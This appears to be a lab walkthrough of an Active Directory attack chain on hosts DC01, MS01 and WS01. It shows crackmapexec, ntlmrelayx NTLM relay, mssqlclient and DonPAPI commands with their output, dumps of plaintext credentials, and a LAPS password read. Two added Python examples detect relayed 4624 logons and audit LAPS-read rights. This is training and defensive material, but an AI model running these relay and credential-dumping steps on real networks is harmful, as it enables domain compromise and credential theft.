Anonymous SMB share on MS01 exposes DB creds:

user=web_staging
password=Washroom510
db=staging

The creds work against MSSQL on MS01 with local auth:

┌──(root㉿kali)-[/home/kali/reflection]
└─# cme mssql 10.10.148.149-151 -u web_staging -p Washroom510 --local-auth
MSSQL       10.10.148.149   1433   DC01             [*] Windows 10.0 Build 20348 (name:DC01) (domain:DC01)
MSSQL       10.10.148.150   1433   MS01             [*] Windows 10.0 Build 20348 (name:MS01) (domain:MS01)
MSSQL       10.10.148.149   1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       10.10.148.150   1433   MS01             [+] web_staging:Washroom510

Nothing interesting in the staging db, but SMB signing is disabled on DC01, so we can relay NTLM auth to it:

impacket-ntlmrelayx -t smb://10.10.148.149 -smb2support -i
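The relay above only works because the target accepts unsigned SMB sessions; requiring SMB signing on the DC closes it. On the detection side, a relayed logon leaves a recognisable trace in the DC's Security log: an NTLM network logon (4624, Logon Type 3) whose Workstation Name is the victim's host while the Source Network Address is the relaying box. The Python below is an added example, not part of these notes or of any tool mentioned here. It parses constructed 4624 message text and applies that check against a constructed hostname-to-IP inventory; the 10.10.148.200 address and the LAB-VM-7 name are made up for the example.

```python
"""Triage Windows Security 4624 (logon) events for signs of NTLM relay.

Added example, not part of the original notes. Heuristic: a relayed NTLM
logon shows Logon Type 3 with Authentication Package NTLM, and the
Workstation Name (copied from the victim's NTLM AUTHENTICATE message)
belongs to a different host than the Source Network Address. Matching
names to addresses needs an asset inventory; the one here is constructed.
"""
import re
from dataclasses import dataclass

# Constructed inventory for the example: hostname -> expected source IP.
INVENTORY = {
    "DC01": "10.10.148.149",
    "MS01": "10.10.148.150",
    "WS01": "10.10.148.151",
}

# Field patterns for the 4624 message text. "Account Name" appears under
# both Subject and New Logon; the New Logon value comes last, so the parser
# keeps the last match of each pattern.
FIELDS = {
    "logon_type": re.compile(r"Logon Type:\s*(\d+)"),
    "auth_package": re.compile(r"Authentication Package:\s*(\S+)"),
    "account": re.compile(r"Account Name:\s*(\S+)"),
    "workstation": re.compile(r"Workstation Name:\s*(\S+)"),
    "source_ip": re.compile(r"Source Network Address:\s*(\S+)"),
}


@dataclass(frozen=True)
class Logon:
    record_id: int
    logon_type: int
    auth_package: str
    account: str
    workstation: str
    source_ip: str


def parse_4624(record_id: int, text: str) -> Logon:
    """Pull the fields we need out of a 4624 message body."""
    vals = {}
    for name, rx in FIELDS.items():
        matches = rx.findall(text)
        vals[name] = matches[-1] if matches else "-"
    return Logon(record_id, int(vals["logon_type"]), vals["auth_package"],
                 vals["account"], vals["workstation"], vals["source_ip"])


def classify(ev: Logon, inventory=INVENTORY) -> str:
    """'relay' if workstation name and source address disagree,
    'unknown-host' if the name is not in inventory, else 'ok'."""
    if ev.logon_type != 3 or ev.auth_package.upper() != "NTLM":
        return "ok"          # not an NTLM network logon; out of scope here
    if ev.workstation == "-":
        return "ok"          # no name to compare against
    expected = inventory.get(ev.workstation.upper())
    if expected is None:
        return "unknown-host"
    return "relay" if ev.source_ip != expected else "ok"


def triage(events, inventory=INVENTORY):
    """Group record ids by verdict; the 'relay' bucket is what to chase."""
    out = {"relay": [], "unknown-host": [], "ok": []}
    for ev in events:
        out[classify(ev, inventory)].append(ev.record_id)
    return out


def _msg(subject, account, ltype, pkg, ws, ip):
    """Build a cut-down 4624 message body in the real event's field order."""
    return (f"Subject:\n\tAccount Name:\t\t{subject}\n"
            f"Logon Type:\t\t{ltype}\n"
            f"New Logon:\n\tAccount Name:\t\t{account}\n"
            f"Network Information:\n\tWorkstation Name:\t{ws}\n"
            f"\tSource Network Address:\t{ip}\n"
            f"Detailed Authentication Information:\n"
            f"\tAuthentication Package:\t{pkg}\n")


# Constructed sample events, not real logs. Record 2 is what MS01's machine
# account relayed to DC01 from a made-up attacker address would look like.
SAMPLE_4624 = {
    1: _msg("-", "MS01$", 3, "NTLM", "MS01", "10.10.148.150"),
    2: _msg("-", "MS01$", 3, "NTLM", "MS01", "10.10.148.200"),
    3: _msg("-", "abbie.smith", 3, "Kerberos", "-", "10.10.148.151"),
    4: _msg("-", "web_staging", 3, "NTLM", "LAB-VM-7", "10.10.148.200"),
}


def run_sample():
    events = [parse_4624(rid, txt) for rid, txt in SAMPLE_4624.items()]
    return triage(events)


if __name__ == "__main__":
    print(run_sample())
```

The check is only as good as the inventory: DHCP churn or a stale name-to-IP map produces false positives, and clients that send a blank Workstation Name cannot be judged at all, which is why the unknown-host bucket is kept separate rather than dropped.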

The relayed SMB session gives us more db creds. Now we can hit the prod db on DC01:

user=web_prod
password=Tribesman201
db=prod

┌──(root㉿kali)-[/home/kali/reflection]
└─# impacket-mssqlclient web_prod:Tribesman201@10.10.148.149
Impacket v0.9.24 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> use prod
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: prod
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'prod'.
SQL> select * from users;
id   name              password            
--   ---------------   -----------------   
 1   b'abbie.smith'    b'CMe1x+nlRaaWEw'
 2   b'dorothy.rose'   b'hC_fny3OK9glSJ'

BloodHound shows abbie.smith has GenericAll on MS01.

That is enough to read the LAPS password for MS01:

cme smb 10.10.132.134 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' --laps
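From the defender's side, the finding above is an ACL problem: any principal with GenericAll on a computer object can read its LAPS password, and the dangerous right is often inherited through nested groups rather than granted directly to the user. The Python below is an added example, not part of these notes or of BloodHound. It walks constructed ACEs and group memberships (a simplified shape, not any tool's real export format), expands membership transitively, and reports every principal outside an allowlist that ends up able to read a computer's LAPS password and how it got there. abbie.smith's GenericAll on MS01 mirrors the notes; the other users, groups and the allowlist are made up.

```python
"""Audit who can read a computer's LAPS password via ACEs and nested groups.

Added example, not part of the original notes. It encodes the point above:
GenericAll (or AllExtendedRights, or an explicit ReadLAPSPassword) on a
computer object is enough to read ms-Mcs-AdmPwd. The ACEs and group
memberships are constructed; their shape is a simplified version of what an
ACL export or BloodHound data would give, not any tool's real format.
"""
from collections import defaultdict

# Rights on a computer object that allow reading its LAPS password.
LAPS_READ_RIGHTS = {"GenericAll", "AllExtendedRights", "ReadLAPSPassword"}

# Principals that are supposed to hold these rights (constructed allowlist).
EXPECTED = {"REFLECTION\\Domain Admins", "REFLECTION\\LAPS Readers"}

# Constructed data. abbie.smith -> GenericAll on MS01 mirrors the notes;
# the other principals and groups are made up for the example.
MEMBERSHIPS = {  # member -> groups it is directly in
    "REFLECTION\\jdoe": ["REFLECTION\\Helpdesk"],
    "REFLECTION\\Helpdesk": ["REFLECTION\\Tier2 Ops"],
    "REFLECTION\\admin.ops": ["REFLECTION\\Domain Admins"],
}
ACES = [  # (holder, computer, right)
    ("REFLECTION\\Domain Admins", "MS01", "GenericAll"),
    ("REFLECTION\\LAPS Readers", "MS01", "ReadLAPSPassword"),
    ("REFLECTION\\abbie.smith", "MS01", "GenericAll"),
    ("REFLECTION\\Tier2 Ops", "WS01", "GenericAll"),
    ("REFLECTION\\jdoe", "WS01", "ReadProperty"),  # plain read, not LAPS
    ("REFLECTION\\Domain Admins", "WS01", "GenericAll"),
]


def expand_groups(memberships):
    """Transitive group membership: {principal: set of all groups it is in}."""
    everyone = set(memberships) | {g for gs in memberships.values() for g in gs}
    closure = {}
    for p in everyone:
        seen, stack = set(), list(memberships.get(p, []))
        while stack:
            g = stack.pop()
            if g not in seen:
                seen.add(g)
                stack.extend(memberships.get(g, []))
        closure[p] = seen
    return closure


def laps_readers(aces, memberships, expected=EXPECTED):
    """Findings as (principal, computer, right, how): every principal that can
    read a computer's LAPS password, directly or through a group, and is not
    on the expected list. Rights held through an expected group are ignored."""
    closure = expand_groups(memberships)
    direct = defaultdict(set)
    for holder, computer, right in aces:
        if right in LAPS_READ_RIGHTS:
            direct[(holder, computer)].add(right)
    principals = set(closure) | {h for h, _, _ in aces}
    computers = sorted({c for _, c, _ in aces})
    findings = []
    for p in sorted(principals - expected):
        for c in computers:
            # Check the principal itself, then every group it belongs to.
            for holder in [p, *sorted(closure.get(p, ()))]:
                if holder in expected:
                    continue
                for right in sorted(direct.get((holder, c), ())):
                    how = "direct" if holder == p else f"via {holder}"
                    findings.append((p, c, right, how))
    return findings


if __name__ == "__main__":
    for finding in laps_readers(ACES, MEMBERSHIPS):
        print(finding)
```

WriteDacl, WriteOwner and ownership are not LAPS reads by themselves but let a principal grant itself one, so a real audit should treat them the same way; and with Windows LAPS the attribute is msLAPS-Password with its own ACEs, so the export you feed in has to cover that attribute too.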

DonPAPI as MS01's local Administrator dumps a stored scheduled-task credential for Georgia.Price:

DonPAPI ms01/Administrator:'H447.++h6g5}xi'@10.10.148.150

[CREDENTIAL]
LastWritten : 2023-06-07 19:22:44
Flags       : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x2 (CRED_PERSIST_LOCAL_MACHINE)
Type        : 0x2 (CRED_PERSIST_LOCAL_MACHINE)
Target      : Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370}
Description : 
Unknown     : 
Username    : REFLECTION\Georgia.Price
Unknown3     : DBl+5MPkpJg5id

As Georgia.Price we have GenericAll on WS01.